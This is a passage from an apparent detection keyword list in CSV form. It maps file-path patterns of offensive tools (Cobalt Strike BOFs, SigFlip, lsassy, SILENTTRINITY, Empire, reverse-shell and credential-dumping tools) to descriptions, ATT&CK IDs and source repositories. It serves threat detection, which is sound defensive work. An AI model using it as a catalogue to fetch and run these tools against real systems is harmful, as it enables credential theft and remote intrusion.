Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*/shodan-api.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/shspawnas/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/ShuckNT.git*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*/si1ent-le/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/si1ent-le/CVE-2022-0847,1,1,N/A,N/A,1,0,2,2022-03-08T05:18:15Z,2022-03-08T04:51:02Z -*/SigFlip.*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/sigflip.x64.*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/sigflip.x86.*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/SigFlip/*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/SigLoader.go*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/SigLoader/*,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/SigLoader/*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,1,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -*/signer-exe.py*,offensive_tool_keyword,PayGen,FUD metasploit Persistence RAT,T1587 T1048 T1588 T1102 T1041,N/A,N/A,N/A,RAT,https://github.com/youhacker55/PayGen,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/SilentClean.exe*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,0,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*/SilentClean/SilentClean/*.cs*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,1,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*/silentdump.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 
- T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/silentdump.h*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/SilentHound.git*,offensive_tool_keyword,SilentHound,Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/layer8secure/SilentHound,1,1,N/A,N/A,5,430,44,2023-01-23T20:41:55Z,2022-07-01T13:49:24Z -*/SilentMoonwalk.git*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,1,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z -*/silentprocessexit.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*/silenttrinity/*.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*/simple_hijacker/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/SimpleLoader.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*/SimpleLoader.exe*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*/Simple-Reverse-Shell*,offensive_tool_keyword,Simple-Reverse-Shell,Simple C++ reverse shell without obfuscation to avoid Win 11 defender detection (At the time of publication,T1548 - T1562 - T1027,TA0003 - TA0008,N/A,N/A,Shell spawning,https://github.com/tihanyin/Simple-Reverse-Shell/,1,1,N/A,N/A,2,114,30,2021-12-21T15:51:48Z,2021-12-19T22:16:32Z 
-*/SimplyEmail.git*,offensive_tool_keyword,SimplyEmail,SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.,T1210.001 - T1190 - T1583.001 - T1590,TA0007 - TA0002 - ,N/A,N/A,Reconnaissance,https://github.com/SimplySecurity/SimplyEmail,1,1,N/A,5,10,918,242,2023-01-12T22:20:25Z,2015-10-30T03:12:10Z -*/sip-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/sip-call-spoof.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/sip-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/sip-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Sitadel.git*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,1,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*/sitadel.log*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*/sitadel.py*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,1,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*/sites-available/striker*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*/sites-enabled/striker*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - 
T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*/situational_awareness/*.exe,offensive_tool_keyword,empire,Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1143,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/situational_awareness/*.ps1,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1147,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/skelsec/pypykatz*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
